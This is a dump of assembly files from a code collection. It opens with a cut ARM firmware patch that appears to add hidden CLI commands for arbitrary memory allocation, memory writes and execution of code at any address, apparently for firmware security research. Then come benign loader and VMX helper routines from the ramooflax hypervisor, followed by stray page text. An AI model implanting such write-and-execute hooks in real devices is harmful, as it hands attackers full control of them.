 * 0x1064..1163 = last arg
 * offset 0x1164 = u32 number of arguments
 * - r6 = ID of CLI Session
 * - r7 = temp register for function address
 */
/* Decode the integer in args[1][1:] into r8 using base16 with alphabet 'ABCDEFGHIJKLMNOP' */
mov r8, #0
add r1, r5, #0x264 /* pointer to 1st char of first arg, which is skipped */
_addr_loop:
ldrb r2, [r1, #1]! /* next char, pre-increment */
sub r2, r2, #0x41 /* digit = char - 'A' */
cmp r2, #0x10
lsllo r8, r8, #4 /* if digit < 16: r8 = r8*16 + digit */
addlo r8, r8, r2
blo _addr_loop /* stop at the first non-alphabet char */
/* Load first char of args[1] */
ldrb r0, [r5, #0x264]
cmp r0, #0x61 /* a */
beq cmd_alloc
cmp r0, #0x66 /* f */
beq cmd_free
cmp r0, #0x77 /* w */
beq cmd_write
cmp r0, #0x78 /* x */
beq cmd_execute
/* Default command: echo args[1] and the decoded value */
mov r3, r8
add r2, r5, #0x264
adr r1, _message
mov r0, r6
ldr r7, CLI_printf
blx r7
return:
ldmdb fp, {r5, r6, r7, r8, r9, r10, fp, sp, pc}
cmd_write:
/* Syntax: wADDR CONTENT
 * Write the memory at the given address
 * regs:
 * r1 = ptr to arg
 * r2 = cur char
 * r3 = cur byte
 * r8 = destination address
 */
add r1, r5, #0x364 /* CONTENT = args[2], hex pairs in A..P alphabet */
_cmdw_data_loop:
ldrb r2, [r1], #1
sub r2, r2, #0x41
cmp r2, #0x10
bhs return /* return if end of data */
lsl r3, r2, #4 /* high nibble */
ldrb r2, [r1], #1
sub r2, r2, #0x41
cmp r2, #0x10
bhs return /* return if end of data */
add r3, r3, r2 /* low nibble */
/* debug */
push {r0, r1, r2, r3}
mov r2, r8
adr r1, _cmdw_addr_fmt
mov r0, r6
ldr r7, CLI_printf
blx r7
pop {r0, r1, r2, r3}
strb r3, [r8], #1 /* store the byte and advance */
b _cmdw_data_loop
/* new segment */
.zero 256 - (. - FIRST_SEGMENT)
SECOND_SEGMENT:
.zero 0x28
cmd_alloc:
/* Syntax: aSIZE
 * Allocate memory of the given size and prints its address
 * regs:
 * r7 = malloc
 * r8 = destination address
 */
mov r0, r8 /* r8 holds the decoded SIZE here */
ldr r7, libc_malloc
blx r7
/* Show the result, in range 0xea000..0xfa000 */
mov r2, r0
adr r1, _cmda_fmt
mov r0, r6
ldr r7, CLI_printf
blx r7
b return
cmd_free:
/* Syntax: fADDR
 * Free the memory at the given address
 */
mov r2, r8
adr r1, _cmdf_fmt
mov r0, r6
ldr r7, CLI_printf
blx r7
mov r0, r8
ldr r7, libc_free
blx r7
b return
cmd_execute:
/* Syntax: xADDR
 * Execute the code at the given address
 * (called with r0 = session ID, r1 = session ptr)
 */
mov r1, r5
mov r0, r6
blx r8
b return
/* get_CLI_session_ptr, useful to get arguments */
get_CLI_session_ptr:
.word ADDR_get_CLI_session_ptr
CLI_printf:
.word ADDR_CLI_printf
libc_malloc:
.word ADDR_libc_malloc
libc_free:
.word ADDR_libc_free
_message:
.ascii "arg[1]=%.256s, r8=%#x\r\n\0"
_cmdw_addr_fmt:
.ascii "%#x <- %#x\r\n\0"
.align 2
_cmda_fmt:
.ascii "alloc %#x\r\n\0"
_cmdf_fmt:
.ascii "free %#x\r\n\0"
|
airbus-seclab/ramooflax
| 1,123
|
loader/src/core/entry.s
|
/*
** Copyright (C) 2016 Airbus Group, stephane duverger <stephane.duverger@airbus.com>
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation; either version 2 of the License, or
** (at your option) any later version.
**
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
**
** You should have received a copy of the GNU General Public License along
** with this program; if not, write to the Free Software Foundation, Inc.,
** 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
.text
.globl entry
.type entry,"function"
/*
** - make us uninterruptible
** - set initial stack for loader
** - clear eflags
** - init loader with grub multiboot info
*/
entry:
cli /* mask maskable interrupts during early init */
movl $__kernel_start__, %esp /* initial loader stack, below the kernel */
pushl $0
popf /* eflags = 0 */
movl %ebx, %eax /* grub multiboot info pointer -> arg for init */
jmp init
|
airbus-seclab/ramooflax
| 3,793
|
setup/src/vmx/vmx_insn.s
|
/*
** Copyright (C) 2016 Airbus Group, stephane duverger <stephane.duverger@airbus.com>
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation; either version 2 of the License, or
** (at your option) any later version.
**
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
**
** You should have received a copy of the GNU General Public License along
** with this program; if not, write to the Free Software Foundation, Inc.,
** 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
.text
.globl __vmx_vmwrite
.type __vmx_vmwrite,"function"
.globl __vmx_vmread
.type __vmx_vmread,"function"
.globl __vmx_vmclear
.type __vmx_vmclear,"function"
.globl __vmx_vmload
.type __vmx_vmload,"function"
.globl __vmx_vmxon
.type __vmx_vmxon,"function"
.globl vmx_vmlaunch
.type vmx_vmlaunch,"function"
/*
** VM-entry
**
** Pops the saved guest GPR frame from the stack and executes
** vmlaunch.  On success vmlaunch does not return; on failure
** execution falls through to vmx_vmlaunch_failure below.
*/
vmx_vmlaunch:
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %r9
popq %r8
popq %rdi
popq %rsi
popq %rbp
addq $8, %rsp /* skip the (unused) saved rsp slot */
popq %rbx
popq %rdx
popq %rcx
popq %rax
vmlaunch
/*
** VM-entry failure
**
** rsp + 32 [ vmx_err ]
** rsp + 24 [ format str ]
** rsp + 16 [ func name ]
** rsp + 8 [ fake_ret @ ]
** rsp + 0 [ panic @ ]
**
** Params:
** RDI = mem64 VMX error code ptr = @vmx_err
*/
vmx_vmlaunch_failure:
mov %rsp, %rdi
push $vmx_vmlaunch_failure_fmt
push $vmx_vmlaunch_failure_fnm
push $0xbadc0de
push $__panic
jmp vmx_check_error
/*
** Enter VMX root operations
**
** params:
** RDI = mem64 VMXON region paddr
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmxon:
vmxon (%rdi)
jc vmx_fail
jmp vmx_success
/*
** Clear VMCS
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = mem64 VMCS region paddr
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmclear:
vmclear (%rsi)
jmp vmx_check_error
/*
** Load VMCS
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = mem64 VMCS region paddr
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmload:
vmptrld (%rsi)
jmp vmx_check_error
/*
** VM write
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = value to write
** RDX = VMCS field encoding
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmwrite:
vmwrite %rsi, %rdx
jmp vmx_check_error
/*
** VM read
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = mem64 read value ptr
** RDX = VMCS field encoding
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmread:
vmread %rdx, (%rsi)
jmp vmx_check_error
/*
** VMX insn error checks
**
** Dispatch on the flags left by the preceding VMX instruction:
** ZF=1 -> VMfailValid, CF=1 -> VMfailInvalid, else success.
*/
vmx_check_error:
jz vmx_fail_valid
jc vmx_fail_invalid
vmx_success:
mov $1, %rax
ret
/*
** VM Fail Valid : ZF=1
**
** read VMCS instruction error (0x4400)
** store it to (%rdi)
*/
vmx_fail_valid:
push %rdx
mov $0x4400, %rdx /* VM_INSTRUCTION_ERROR field encoding */
vmread %rdx, (%rdi)
pop %rdx
jmp vmx_fail
/*
** VM Fail Invalid : CF=1
**
** VMCS instruction error code is 0
*/
vmx_fail_invalid:
movl $0, (%rdi)
vmx_fail:
xor %rax, %rax
ret
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.